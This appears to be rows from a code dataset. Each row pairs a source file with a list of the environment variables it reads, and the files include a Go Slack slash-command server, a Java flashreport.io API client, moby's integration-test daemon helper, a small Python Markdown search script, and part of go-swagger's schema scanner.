err = pglogrepl.SendStandbyStatusUpdate(ctx, conn, pglogrepl.StandbyStatusUpdate{WALWritePosition: sysident.XLogPos})
require.NoError(t, err)
}
|
[
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_SKIP_BASE_BACKUP\"",
"\"PGLOGREPL_TEST_CONN_STRING\"",
"\"PGLOGREPL_TEST_CONN_STRING\""
] |
[] |
[
"PGLOGREPL_SKIP_BASE_BACKUP",
"PGLOGREPL_TEST_CONN_STRING"
] |
[]
|
["PGLOGREPL_SKIP_BASE_BACKUP", "PGLOGREPL_TEST_CONN_STRING"]
|
go
| 2 | 0 | |
main.go
|
package main
import (
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"log"
"net/http"
"net/url"
"os"
"github.com/jesselucas/slackcmd/commands/beats1"
"github.com/jesselucas/slackcmd/commands/calendar"
"github.com/jesselucas/slackcmd/commands/qotd"
"github.com/jesselucas/slackcmd/commands/trello"
"github.com/jesselucas/slackcmd/slack"
)
// env holds a single environment variable (key/value pair) read from config.json
type env struct {
Key string
Value string
}
func main() {
	// set up environment variables if a config.json exists
setEnvFromJSON("config.json")
// url setup. FIX make more generic
var url string
if os.Getenv("PORT") != "" {
url = ":" + os.Getenv("PORT")
} else {
url = "localhost:8080"
}
// vs := validateSlackToken(http.HandlerFunc(commandHandler), slackAPIKey)
http.HandleFunc("/cmd/", commandHandler)
http.HandleFunc("/cmd", commandHandler)
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
fmt.Fprint(w, "Go away!")
})
log.Fatal(http.ListenAndServe(url, nil))
}
func setEnvFromJSON(configPath string) {
configFile, err := ioutil.ReadFile(configPath)
if err != nil {
fmt.Println("config.json not found. Using os environment variables.")
return
}
var envVars []env
json.Unmarshal(configFile, &envVars)
// set environment variables
for _, env := range envVars {
// fmt.Println(env)
os.Setenv(env.Key, env.Value)
}
}
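// A minimal sketch of the config.json layout that setEnvFromJSON expects,
// inferred from the env struct above; the key and value shown are
// placeholders, not from the original source:
//
//	[
//	  {"Key": "PORT", "Value": "8080"}
//	]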
func createSlashCommand(w http.ResponseWriter, r *http.Request) *slack.SlashCommand {
var v url.Values
switch r.Method {
case "POST":
r.ParseForm()
v = r.Form
case "GET":
v = r.URL.Query()
}
sc := &slack.SlashCommand{
Token: v.Get("token"),
TeamId: v.Get("team_id"),
TeamDomain: v.Get("team_domain"),
ChannelId: v.Get("channel_id"),
ChannelName: v.Get("channel_name"),
UserId: v.Get("user_id"),
UserName: v.Get("user_name"),
Command: v.Get("command"),
Text: v.Get("text"),
Hook: v.Get("hook"),
}
return sc
}
func commandHandler(w http.ResponseWriter, r *http.Request) {
sc := createSlashCommand(w, r)
// interface reference for slack Commands
var cmd slack.Command
// Create FlagSet to store flags
fs := &slack.FlagSet{}
// Add commands here
switch sc.Command {
case "/fg":
cmd = &trello.Command{}
fs.Usage = "/fg help: FG Trello access"
case "/beats1":
cmd = &beats1.Command{}
fs.Usage = "/beats1 help: Song currently playing on Beats1"
case "/conference":
cmd = &calendar.Command{}
fs.Usage = "/conference help: Schedule for FG Conference room"
case "/qotd":
cmd = &qotd.Command{}
fs.Usage = "/qotd help: Sends the Question of the Day"
default:
err := errors.New("No Command found")
http.Error(w, err.Error(), http.StatusForbidden)
return
}
fmt.Println("slash command:", sc.Text)
// parse out flags
parsedCommands, flags := slack.SeparateFlags(sc.Text)
sc.Text = parsedCommands
// command request returns payload
	cp, err := cmd.Request(sc)
	if err != nil || cp == nil {
		http.Error(w, "Unauthorized", http.StatusForbidden)
		return
	}
// Set Flags for Commands
slack.SetFlag(fs, "channel", "c", "Sends the response to the current channel", func() {
cp.Channel = fmt.Sprintf("#%v", sc.ChannelName)
cp.SendPayload = true
cp.SlashResponse = false
})
slack.SetFlag(fs, "private", "p", "Sends a private message with the response", func() {
cp.SendPayload = true
cp.SlashResponse = false
})
sc.Text = parsedCommands
	// TODO: Move ParseFlags call so it happens before cmd.Request is called
help, response := slack.ParseFlags(fs, flags)
	if help {
cp.Text = response
}
// check if the command wants to send a slash command response
if cp.SlashResponse {
w.Write([]byte(cp.Text))
}
// don't send payload if hook URL isn't passed
	if sc.Hook != "" && cp.SendPayload {
cpJSON, err := json.Marshal(cp)
		if err != nil {
			http.Error(w, "failed to encode payload", http.StatusInternalServerError)
			return
		}
cpJSONString := string(cpJSON[:])
// Make the request to the Slack API.
http.PostForm(sc.Hook, url.Values{"payload": {cpJSONString}})
}
}
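// Hypothetical request handled by commandHandler (parameter values are
// illustrative only; the token value is deliberately elided):
//
//	GET /cmd?command=/beats1&text=help&token=...&channel_name=general&user_name=alice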
|
[
"\"PORT\"",
"\"PORT\""
] |
[] |
[
"PORT"
] |
[]
|
["PORT"]
|
go
| 1 | 0 | |
common/tools/findPNG/findPNG.py
|
import glob
import sys
import re
import os
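# Usage sketch (the search string below is illustrative, not from the original
# source): python findPNG.py ".png"
# The script walks the learning-library tree for .md files containing the given
# string and writes the matches to $HOME/md_list.csv.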
# Change to learning-library path
src = os.path.dirname(os.path.dirname(os.path.dirname(os.getcwd())))
all_manis = []
string_to_search = sys.argv[1]
home_dir = os.environ['HOME']
csv_file = 'md_list.csv'
csv_dir = os.path.join(home_dir, csv_file)
file_number = 0
destination = open(csv_dir, 'w')
destination.write('number,markdown \n')
# Find all .md files and store them in a list
for f in glob.glob(src + '/**/*.md', recursive=True):
    all_manis.append(f)
# Iterate through the list and search every .md file
for mani in all_manis:
#print('Working on ' + mani)
aFile = mani
    source = open(aFile, 'r')
for line in source:
if string_to_search in line:
m = re.search('/(learning-library.*)', aFile)
if m:
path2manifest = m.group(1)
file_number += 1
print(aFile)
destination.write(str(file_number) + ',' + path2manifest + '\n')
    source.close()
destination.close()
|
[] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
python
| 1 | 0 | |
src/main/java/io/flashreport/cfspring/integration/FlashreportClient.java
|
package io.flashreport.cfspring.integration;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import org.springframework.http.*;
import org.springframework.web.client.RestTemplate;
import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Base64;
/**
* Simple client to send report generation requests to flashreport.io, as well as getting information
* about a report request.
* <p>
* The flashreport api key is extracted from the VCAP_SERVICES environment variable, which is set by Cloud Foundry.
* <p>
* Created by Nicolas Lejeune on 18/06/15.
*/
public class FlashreportClient {
private static final String CREATE_URL = "https://gateway.flashreport.io/api/v1/report/new";
private static final String BASE_URL = "https://gateway.flashreport.io/api/v1/report/";
private String API_KEY;
/**
* Request the generation of a report with the specified content.
*
* @param content json or xml data
* @return the URI representing the report
*/
public URI generateReport(String content) {
return generateReport(content, null, null);
}
/**
* Request the generation of a report with the specified content and title.
*
* @param content json or xml data
* @param title a title for your report
* @return the URI representing the report
*/
public URI generateReport(String content, String title) {
return generateReport(content, title, null);
}
/**
* Request the generation of a report with the specified content, title and template.
* The template must have been previously registered in the dashboard.
*
* @param content json or xml data
* @param title a title for your report
* @return the URI representing the report
*/
public URI generateReport(String content, String title, String template) {
RestTemplate restTemplate = new RestTemplate();
HttpEntity entityWithBody = new HttpEntity<>(content, getHeaders());
String url = CREATE_URL;
if (title != null) url += "?title=" + title;
if (title != null && template != null) url += "&template=" + template;
if (title == null && template != null) url += "?template=" + template;
ResponseEntity<String> response = restTemplate.exchange(url, HttpMethod.POST, entityWithBody, String.class);
if (response.getStatusCode().equals(HttpStatus.CREATED)) {
return response.getHeaders().getLocation();
} else {
throw new RuntimeException("Received unexpected response code : " + response.getStatusCode());
}
}
public String getStorageUrl(String uuid) {
HttpEntity entity = new HttpEntity<>(getHeaders());
RestTemplate restTemplate = new RestTemplate();
ResponseEntity<String> response = restTemplate.exchange(BASE_URL + uuid + "/storage", HttpMethod.GET, entity, String.class);
if (response.getStatusCode().equals(HttpStatus.OK)) {
return response.getBody();
} else {
throw new RuntimeException("Received unexpected response code : " + response.getStatusCode());
}
}
public ReportStatus getReportStatus(String uuid) {
try {
return getReportStatus(new URI(BASE_URL + uuid));
} catch (URISyntaxException e) {
throw new IllegalArgumentException("Unable to construct a uri with report uuid [" + uuid + "]");
}
}
public ReportStatus getReportStatus(URI reportUri) {
HttpEntity entity = new HttpEntity<>(getHeaders());
RestTemplate restTemplate = new RestTemplate();
ResponseEntity<String> response = restTemplate.exchange(reportUri, HttpMethod.GET, entity, String.class);
if (response.getStatusCode().equals(HttpStatus.OK)) {
ObjectMapper mapper = new ObjectMapper();
ReportStatus status;
try {
status = mapper.readValue(response.getBody(), ReportStatus.class);
} catch (IOException e) {
throw new RuntimeException("Could not parse response body : " + response.getBody());
}
return status;
} else {
throw new RuntimeException("Received unexpected response code : " + response.getStatusCode());
}
}
private String extractApiKey() throws IllegalStateException {
if (API_KEY != null) return API_KEY;
String vcap_services = System.getenv("VCAP_SERVICES");
if (vcap_services == null) {
throw new IllegalStateException("Unable to get VCAP_SERVICES from environment.");
}
try {
ObjectMapper objectMapper = new ObjectMapper();
JsonNode jsonNode = objectMapper.readValue(vcap_services, JsonNode.class);
API_KEY = jsonNode.get("flashreport").get(0).get("credentials").get("apiKey").asText();
} catch (IOException | NullPointerException e) {
throw new IllegalStateException(
"Unable to extract api key from VCAP_SERVICES. Did you bind a flashreport service to your app?");
}
return API_KEY;
}
private HttpHeaders getHeaders() {
HttpHeaders httpHeaders = new HttpHeaders();
String basicHeader = "Basic " + Base64.getEncoder().encodeToString((extractApiKey() + ":").getBytes());
httpHeaders.add("Authorization", basicHeader);
return httpHeaders;
}
}
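// Usage sketch (not part of the original source; the payload and title below
// are illustrative only):
//
//   FlashreportClient client = new FlashreportClient();
//   URI reportUri = client.generateReport("{\"name\":\"example\"}", "My report");
//   ReportStatus status = client.getReportStatus(reportUri);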
|
[
"\"VCAP_SERVICES\""
] |
[] |
[
"VCAP_SERVICES"
] |
[]
|
["VCAP_SERVICES"]
|
java
| 1 | 0 | |
internal/test/daemon/daemon.go
|
package daemon // import "moby/internal/test/daemon"
import (
"context"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"os"
"os/exec"
"path/filepath"
"strconv"
"strings"
"time"
"moby/api/types"
"moby/api/types/events"
"moby/client"
"moby/internal/test"
"moby/internal/test/request"
"moby/opts"
"moby/pkg/ioutils"
"moby/pkg/stringid"
"github.com/docker/go-connections/sockets"
"github.com/docker/go-connections/tlsconfig"
"github.com/pkg/errors"
"gotest.tools/assert"
)
type testingT interface {
assert.TestingT
logT
Fatalf(string, ...interface{})
}
type logT interface {
Logf(string, ...interface{})
}
const defaultDockerdBinary = "dockerd"
var errDaemonNotStarted = errors.New("daemon not started")
// SockRoot holds the path of the default docker integration daemon socket
var SockRoot = filepath.Join(os.TempDir(), "docker-integration")
type clientConfig struct {
transport *http.Transport
scheme string
addr string
}
// Daemon represents a Docker daemon for the testing framework
type Daemon struct {
GlobalFlags []string
Root string
Folder string
Wait chan error
UseDefaultHost bool
UseDefaultTLSHost bool
id string
logFile *os.File
cmd *exec.Cmd
storageDriver string
userlandProxy bool
execRoot string
experimental bool
init bool
dockerdBinary string
log logT
	// swarm-related fields
swarmListenAddr string
SwarmPort int // FIXME(vdemeester) should probably not be exported
DefaultAddrPool []string
SubnetSize uint32
// cached information
CachedInfo types.Info
}
// New returns a Daemon instance to be used for testing.
// This will create a directory such as d123456789 in the folder specified by $DOCKER_INTEGRATION_DAEMON_DEST or $DEST.
// The daemon will not automatically start.
func New(t testingT, ops ...func(*Daemon)) *Daemon {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
dest := os.Getenv("DOCKER_INTEGRATION_DAEMON_DEST")
if dest == "" {
dest = os.Getenv("DEST")
}
assert.Check(t, dest != "", "Please set the DOCKER_INTEGRATION_DAEMON_DEST or the DEST environment variable")
storageDriver := os.Getenv("DOCKER_GRAPHDRIVER")
assert.NilError(t, os.MkdirAll(SockRoot, 0700), "could not create daemon socket root")
id := fmt.Sprintf("d%s", stringid.TruncateID(stringid.GenerateRandomID()))
dir := filepath.Join(dest, id)
daemonFolder, err := filepath.Abs(dir)
assert.NilError(t, err, "Could not make %q an absolute path", dir)
daemonRoot := filepath.Join(daemonFolder, "root")
assert.NilError(t, os.MkdirAll(daemonRoot, 0755), "Could not create daemon root %q", dir)
userlandProxy := true
if env := os.Getenv("DOCKER_USERLANDPROXY"); env != "" {
		if val, err := strconv.ParseBool(env); err == nil {
userlandProxy = val
}
}
d := &Daemon{
id: id,
Folder: daemonFolder,
Root: daemonRoot,
storageDriver: storageDriver,
userlandProxy: userlandProxy,
execRoot: filepath.Join(os.TempDir(), "docker-execroot", id),
dockerdBinary: defaultDockerdBinary,
swarmListenAddr: defaultSwarmListenAddr,
SwarmPort: DefaultSwarmPort,
log: t,
}
for _, op := range ops {
op(d)
}
return d
}
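// Minimal usage sketch (not from the original source; assumes the
// DOCKER_INTEGRATION_DAEMON_DEST or DEST environment variable is set as
// required by New above):
//
//	d := daemon.New(t)
//	d.Start(t)
//	defer d.Cleanup(t)
//	defer d.Stop(t)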
// RootDir returns the root directory of the daemon.
func (d *Daemon) RootDir() string {
return d.Root
}
// ID returns the generated id of the daemon
func (d *Daemon) ID() string {
return d.id
}
// StorageDriver returns the configured storage driver of the daemon
func (d *Daemon) StorageDriver() string {
return d.storageDriver
}
// Sock returns the socket path of the daemon
func (d *Daemon) Sock() string {
	return "unix://" + d.sockPath()
}
func (d *Daemon) sockPath() string {
return filepath.Join(SockRoot, d.id+".sock")
}
// LogFileName returns the path of the daemon's log file
func (d *Daemon) LogFileName() string {
return d.logFile.Name()
}
// ReadLogFile returns the content of the daemon log file
func (d *Daemon) ReadLogFile() ([]byte, error) {
return ioutil.ReadFile(d.logFile.Name())
}
// NewClient creates a new client based on the daemon's socket path
// FIXME(vdemeester): replace NewClient with NewClientT
func (d *Daemon) NewClient() (*client.Client, error) {
return client.NewClientWithOpts(
client.FromEnv,
client.WithHost(d.Sock()))
}
// NewClientT creates a new client based on the daemon's socket path
// FIXME(vdemeester): replace NewClient with NewClientT
func (d *Daemon) NewClientT(t assert.TestingT) *client.Client {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
c, err := client.NewClientWithOpts(
client.FromEnv,
client.WithHost(d.Sock()))
assert.NilError(t, err, "cannot create daemon client")
return c
}
// Cleanup cleans the daemon files: exec root (network namespaces, ...), swarmkit files
func (d *Daemon) Cleanup(t testingT) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
// Cleanup swarmkit wal files if present
cleanupRaftDir(t, d.Root)
cleanupNetworkNamespace(t, d.execRoot)
}
// Start starts the daemon and returns once it is ready to receive requests.
func (d *Daemon) Start(t testingT, args ...string) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
if err := d.StartWithError(args...); err != nil {
t.Fatalf("failed to start daemon with arguments %v : %v", args, err)
}
}
// StartWithError starts the daemon and returns once it is ready to receive requests.
// It returns an error in case it couldn't start.
func (d *Daemon) StartWithError(args ...string) error {
logFile, err := os.OpenFile(filepath.Join(d.Folder, "docker.log"), os.O_RDWR|os.O_CREATE|os.O_APPEND, 0600)
if err != nil {
return errors.Wrapf(err, "[%s] Could not create %s/docker.log", d.id, d.Folder)
}
return d.StartWithLogFile(logFile, args...)
}
// StartWithLogFile will start the daemon and attach its streams to a given file.
func (d *Daemon) StartWithLogFile(out *os.File, providedArgs ...string) error {
d.handleUserns()
dockerdBinary, err := exec.LookPath(d.dockerdBinary)
if err != nil {
return errors.Wrapf(err, "[%s] could not find docker binary in $PATH", d.id)
}
args := append(d.GlobalFlags,
"--containerd", "/var/run/docker/containerd/docker-containerd.sock",
"--data-root", d.Root,
"--exec-root", d.execRoot,
"--pidfile", fmt.Sprintf("%s/docker.pid", d.Folder),
fmt.Sprintf("--userland-proxy=%t", d.userlandProxy),
)
if d.experimental {
args = append(args, "--experimental")
}
if d.init {
args = append(args, "--init")
}
if !(d.UseDefaultHost || d.UseDefaultTLSHost) {
args = append(args, []string{"--host", d.Sock()}...)
}
if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
args = append(args, []string{"--userns-remap", root}...)
}
// If we don't explicitly set the log-level or debug flag(-D) then
// turn on debug mode
foundLog := false
foundSd := false
for _, a := range providedArgs {
if strings.Contains(a, "--log-level") || strings.Contains(a, "-D") || strings.Contains(a, "--debug") {
foundLog = true
}
if strings.Contains(a, "--storage-driver") {
foundSd = true
}
}
if !foundLog {
args = append(args, "--debug")
}
if d.storageDriver != "" && !foundSd {
args = append(args, "--storage-driver", d.storageDriver)
}
args = append(args, providedArgs...)
d.cmd = exec.Command(dockerdBinary, args...)
d.cmd.Env = append(os.Environ(), "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE=1")
d.cmd.Stdout = out
d.cmd.Stderr = out
d.logFile = out
if err := d.cmd.Start(); err != nil {
return errors.Errorf("[%s] could not start daemon container: %v", d.id, err)
}
wait := make(chan error)
go func() {
wait <- d.cmd.Wait()
d.log.Logf("[%s] exiting daemon", d.id)
close(wait)
}()
d.Wait = wait
tick := time.Tick(500 * time.Millisecond)
// make sure daemon is ready to receive requests
startTime := time.Now().Unix()
for {
d.log.Logf("[%s] waiting for daemon to start", d.id)
if time.Now().Unix()-startTime > 5 {
// After 5 seconds, give up
return errors.Errorf("[%s] Daemon exited and never started", d.id)
}
select {
case <-time.After(2 * time.Second):
return errors.Errorf("[%s] timeout: daemon does not respond", d.id)
case <-tick:
clientConfig, err := d.getClientConfig()
if err != nil {
return err
}
client := &http.Client{
Transport: clientConfig.transport,
}
req, err := http.NewRequest("GET", "/_ping", nil)
if err != nil {
return errors.Wrapf(err, "[%s] could not create new request", d.id)
}
req.URL.Host = clientConfig.addr
req.URL.Scheme = clientConfig.scheme
resp, err := client.Do(req)
if err != nil {
continue
}
resp.Body.Close()
if resp.StatusCode != http.StatusOK {
d.log.Logf("[%s] received status != 200 OK: %s\n", d.id, resp.Status)
}
d.log.Logf("[%s] daemon started\n", d.id)
d.Root, err = d.queryRootDir()
if err != nil {
return errors.Errorf("[%s] error querying daemon for root directory: %v", d.id, err)
}
return nil
case err := <-d.Wait:
return errors.Errorf("[%s] Daemon exited during startup: %v", d.id, err)
}
}
}
// StartWithBusybox will first start the daemon with Daemon.Start()
// then save the busybox image from the main daemon and load it into this Daemon instance.
func (d *Daemon) StartWithBusybox(t testingT, arg ...string) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
d.Start(t, arg...)
d.LoadBusybox(t)
}
// Kill will send a SIGKILL to the daemon
func (d *Daemon) Kill() error {
if d.cmd == nil || d.Wait == nil {
return errDaemonNotStarted
}
defer func() {
d.logFile.Close()
d.cmd = nil
}()
if err := d.cmd.Process.Kill(); err != nil {
return err
}
return os.Remove(fmt.Sprintf("%s/docker.pid", d.Folder))
}
// Pid returns the pid of the daemon
func (d *Daemon) Pid() int {
return d.cmd.Process.Pid
}
// Interrupt stops the daemon by sending it an Interrupt signal
func (d *Daemon) Interrupt() error {
return d.Signal(os.Interrupt)
}
// Signal sends the specified signal to the daemon if running
func (d *Daemon) Signal(signal os.Signal) error {
if d.cmd == nil || d.Wait == nil {
return errDaemonNotStarted
}
return d.cmd.Process.Signal(signal)
}
// DumpStackAndQuit sends SIGQUIT to the daemon, which triggers it to dump its
// stack to its log file and exit
// This is used primarily for gathering debug information on test timeout
func (d *Daemon) DumpStackAndQuit() {
if d.cmd == nil || d.cmd.Process == nil {
return
}
SignalDaemonDump(d.cmd.Process.Pid)
}
// Stop will send a SIGINT every second and wait for the daemon to stop.
// If it times out, a SIGKILL is sent.
// Stop will not delete the daemon directory. If a purged daemon is needed,
// instantiate a new one with NewDaemon.
// If an error occurs while starting the daemon, the test will fail.
func (d *Daemon) Stop(t testingT) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
err := d.StopWithError()
if err != nil {
if err != errDaemonNotStarted {
t.Fatalf("Error while stopping the daemon %s : %v", d.id, err)
} else {
t.Logf("Daemon %s is not started", d.id)
}
}
}
// StopWithError will send a SIGINT every second and wait for the daemon to stop.
// If it times out, a SIGKILL is sent.
// Stop will not delete the daemon directory. If a purged daemon is needed,
// instantiate a new one with NewDaemon.
func (d *Daemon) StopWithError() error {
if d.cmd == nil || d.Wait == nil {
return errDaemonNotStarted
}
defer func() {
d.logFile.Close()
d.cmd = nil
}()
i := 1
tick := time.Tick(time.Second)
if err := d.cmd.Process.Signal(os.Interrupt); err != nil {
if strings.Contains(err.Error(), "os: process already finished") {
return errDaemonNotStarted
}
return errors.Errorf("could not send signal: %v", err)
}
out1:
for {
select {
case err := <-d.Wait:
return err
case <-time.After(20 * time.Second):
// time for stopping jobs and run onShutdown hooks
d.log.Logf("[%s] daemon stop timeout", d.id)
break out1
}
}
out2:
for {
select {
case err := <-d.Wait:
return err
case <-tick:
i++
if i > 5 {
d.log.Logf("tried to interrupt daemon for %d times, now try to kill it", i)
break out2
}
d.log.Logf("Attempt #%d: daemon is still running with pid %d", i, d.cmd.Process.Pid)
if err := d.cmd.Process.Signal(os.Interrupt); err != nil {
return errors.Errorf("could not send signal: %v", err)
}
}
}
if err := d.cmd.Process.Kill(); err != nil {
d.log.Logf("Could not kill daemon: %v", err)
return err
}
d.cmd.Wait()
return os.Remove(fmt.Sprintf("%s/docker.pid", d.Folder))
}
// Restart will restart the daemon by first stopping it and then starting it.
// If an error occurs while starting the daemon, the test will fail.
func (d *Daemon) Restart(t testingT, args ...string) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
d.Stop(t)
d.Start(t, args...)
}
// RestartWithError will restart the daemon by first stopping it and then starting it.
func (d *Daemon) RestartWithError(arg ...string) error {
if err := d.StopWithError(); err != nil {
return err
}
return d.StartWithError(arg...)
}
func (d *Daemon) handleUserns() {
// in the case of tests running a user namespace-enabled daemon, we have resolved
// d.Root to be the actual final path of the graph dir after the "uid.gid" of
// remapped root is added--we need to subtract it from the path before calling
// start or else we will continue making subdirectories rather than truly restarting
// with the same location/root:
if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
d.Root = filepath.Dir(d.Root)
}
}
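// Illustrative example of the adjustment above (paths are hypothetical): with
// DOCKER_REMAP_ROOT set, a resolved root such as ".../d1234/root/100000.100000"
// is trimmed back to ".../d1234/root" before the daemon is restarted.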
// ReloadConfig asks the daemon to reload its configuration
func (d *Daemon) ReloadConfig() error {
if d.cmd == nil || d.cmd.Process == nil {
return errors.New("daemon is not running")
}
errCh := make(chan error)
started := make(chan struct{})
go func() {
_, body, err := request.Get("/events", request.Host(d.Sock()))
close(started)
		if err != nil {
			errCh <- err
			return
		}
defer body.Close()
dec := json.NewDecoder(body)
for {
var e events.Message
if err := dec.Decode(&e); err != nil {
errCh <- err
return
}
if e.Type != events.DaemonEventType {
continue
}
if e.Action != "reload" {
continue
}
close(errCh) // notify that we are done
return
}
}()
<-started
if err := signalDaemonReload(d.cmd.Process.Pid); err != nil {
return errors.Errorf("error signaling daemon reload: %v", err)
}
select {
case err := <-errCh:
if err != nil {
return errors.Errorf("error waiting for daemon reload event: %v", err)
}
case <-time.After(30 * time.Second):
return errors.New("timeout waiting for daemon reload event")
}
return nil
}
// LoadBusybox loads the busybox image into the daemon
func (d *Daemon) LoadBusybox(t assert.TestingT) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
clientHost, err := client.NewEnvClient()
assert.NilError(t, err, "failed to create client")
defer clientHost.Close()
ctx := context.Background()
reader, err := clientHost.ImageSave(ctx, []string{"busybox:latest"})
assert.NilError(t, err, "failed to download busybox")
defer reader.Close()
client, err := d.NewClient()
assert.NilError(t, err, "failed to create client")
defer client.Close()
resp, err := client.ImageLoad(ctx, reader, true)
assert.NilError(t, err, "failed to load busybox")
defer resp.Body.Close()
}
func (d *Daemon) getClientConfig() (*clientConfig, error) {
var (
transport *http.Transport
scheme string
addr string
proto string
)
if d.UseDefaultTLSHost {
option := &tlsconfig.Options{
CAFile: "fixtures/https/ca.pem",
CertFile: "fixtures/https/client-cert.pem",
KeyFile: "fixtures/https/client-key.pem",
}
tlsConfig, err := tlsconfig.Client(*option)
if err != nil {
return nil, err
}
transport = &http.Transport{
TLSClientConfig: tlsConfig,
}
addr = fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort)
scheme = "https"
proto = "tcp"
} else if d.UseDefaultHost {
addr = opts.DefaultUnixSocket
proto = "unix"
scheme = "http"
transport = &http.Transport{}
} else {
addr = d.sockPath()
proto = "unix"
scheme = "http"
transport = &http.Transport{}
}
if err := sockets.ConfigureTransport(transport, proto, addr); err != nil {
return nil, err
}
transport.DisableKeepAlives = true
return &clientConfig{
transport: transport,
scheme: scheme,
addr: addr,
}, nil
}
func (d *Daemon) queryRootDir() (string, error) {
// update daemon root by asking /info endpoint (to support user
// namespaced daemon with root remapped uid.gid directory)
clientConfig, err := d.getClientConfig()
if err != nil {
return "", err
}
client := &http.Client{
Transport: clientConfig.transport,
}
req, err := http.NewRequest("GET", "/info", nil)
if err != nil {
return "", err
}
req.Header.Set("Content-Type", "application/json")
req.URL.Host = clientConfig.addr
req.URL.Scheme = clientConfig.scheme
resp, err := client.Do(req)
if err != nil {
return "", err
}
body := ioutils.NewReadCloserWrapper(resp.Body, func() error {
return resp.Body.Close()
})
type Info struct {
DockerRootDir string
}
var b []byte
var i Info
b, err = request.ReadBody(body)
if err == nil && resp.StatusCode == http.StatusOK {
// read the docker root dir
if err = json.Unmarshal(b, &i); err == nil {
return i.DockerRootDir, nil
}
}
return "", err
}
// Info returns the info struct for this daemon
func (d *Daemon) Info(t assert.TestingT) types.Info {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
apiclient, err := d.NewClient()
assert.NilError(t, err)
info, err := apiclient.Info(context.Background())
assert.NilError(t, err)
return info
}
func cleanupRaftDir(t testingT, rootPath string) {
if ht, ok := t.(test.HelperT); ok {
ht.Helper()
}
walDir := filepath.Join(rootPath, "swarm/raft/wal")
if err := os.RemoveAll(walDir); err != nil {
t.Logf("error removing %v: %v", walDir, err)
}
}
|
[
"\"DOCKER_INTEGRATION_DAEMON_DEST\"",
"\"DEST\"",
"\"DOCKER_GRAPHDRIVER\"",
"\"DOCKER_USERLANDPROXY\"",
"\"DOCKER_REMAP_ROOT\"",
"\"DOCKER_REMAP_ROOT\""
] |
[] |
[
"DOCKER_REMAP_ROOT",
"DOCKER_USERLANDPROXY",
"DOCKER_INTEGRATION_DAEMON_DEST",
"DOCKER_GRAPHDRIVER",
"DEST"
] |
[]
|
["DOCKER_REMAP_ROOT", "DOCKER_USERLANDPROXY", "DOCKER_INTEGRATION_DAEMON_DEST", "DOCKER_GRAPHDRIVER", "DEST"]
|
go
| 5 | 0 | |
golang/vendor/github.com/go-swagger/go-swagger/scan/schema.go
|
// Copyright 2015 go-swagger maintainers
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package scan
import (
"fmt"
"go/ast"
"log"
"os"
"path/filepath"
"reflect"
"runtime"
"strconv"
"strings"
"golang.org/x/tools/go/loader"
"github.com/go-openapi/spec"
)
type schemaTypable struct {
schema *spec.Schema
level int
}
func (st schemaTypable) Typed(tpe, format string) {
st.schema.Typed(tpe, format)
}
func (st schemaTypable) SetRef(ref spec.Ref) {
st.schema.Ref = ref
}
func (st schemaTypable) Schema() *spec.Schema {
return st.schema
}
func (st schemaTypable) Items() swaggerTypable {
if st.schema.Items == nil {
st.schema.Items = new(spec.SchemaOrArray)
}
if st.schema.Items.Schema == nil {
st.schema.Items.Schema = new(spec.Schema)
}
st.schema.Typed("array", "")
return schemaTypable{st.schema.Items.Schema, st.level + 1}
}
func (st schemaTypable) AdditionalProperties() swaggerTypable {
if st.schema.AdditionalProperties == nil {
st.schema.AdditionalProperties = new(spec.SchemaOrBool)
}
if st.schema.AdditionalProperties.Schema == nil {
st.schema.AdditionalProperties.Schema = new(spec.Schema)
}
st.schema.Typed("object", "")
return schemaTypable{st.schema.AdditionalProperties.Schema, st.level + 1}
}
func (st schemaTypable) Level() int { return st.level }
type schemaValidations struct {
current *spec.Schema
}
func (sv schemaValidations) SetMaximum(val float64, exclusive bool) {
sv.current.Maximum = &val
sv.current.ExclusiveMaximum = exclusive
}
func (sv schemaValidations) SetMinimum(val float64, exclusive bool) {
sv.current.Minimum = &val
sv.current.ExclusiveMinimum = exclusive
}
func (sv schemaValidations) SetMultipleOf(val float64) { sv.current.MultipleOf = &val }
func (sv schemaValidations) SetMinItems(val int64) { sv.current.MinItems = &val }
func (sv schemaValidations) SetMaxItems(val int64) { sv.current.MaxItems = &val }
func (sv schemaValidations) SetMinLength(val int64) { sv.current.MinLength = &val }
func (sv schemaValidations) SetMaxLength(val int64) { sv.current.MaxLength = &val }
func (sv schemaValidations) SetPattern(val string) { sv.current.Pattern = val }
func (sv schemaValidations) SetUnique(val bool) { sv.current.UniqueItems = val }
func (sv schemaValidations) SetDefault(val interface{}) { sv.current.Default = val }
func (sv schemaValidations) SetEnum(val string) {
list := strings.Split(val, ",")
interfaceSlice := make([]interface{}, len(list))
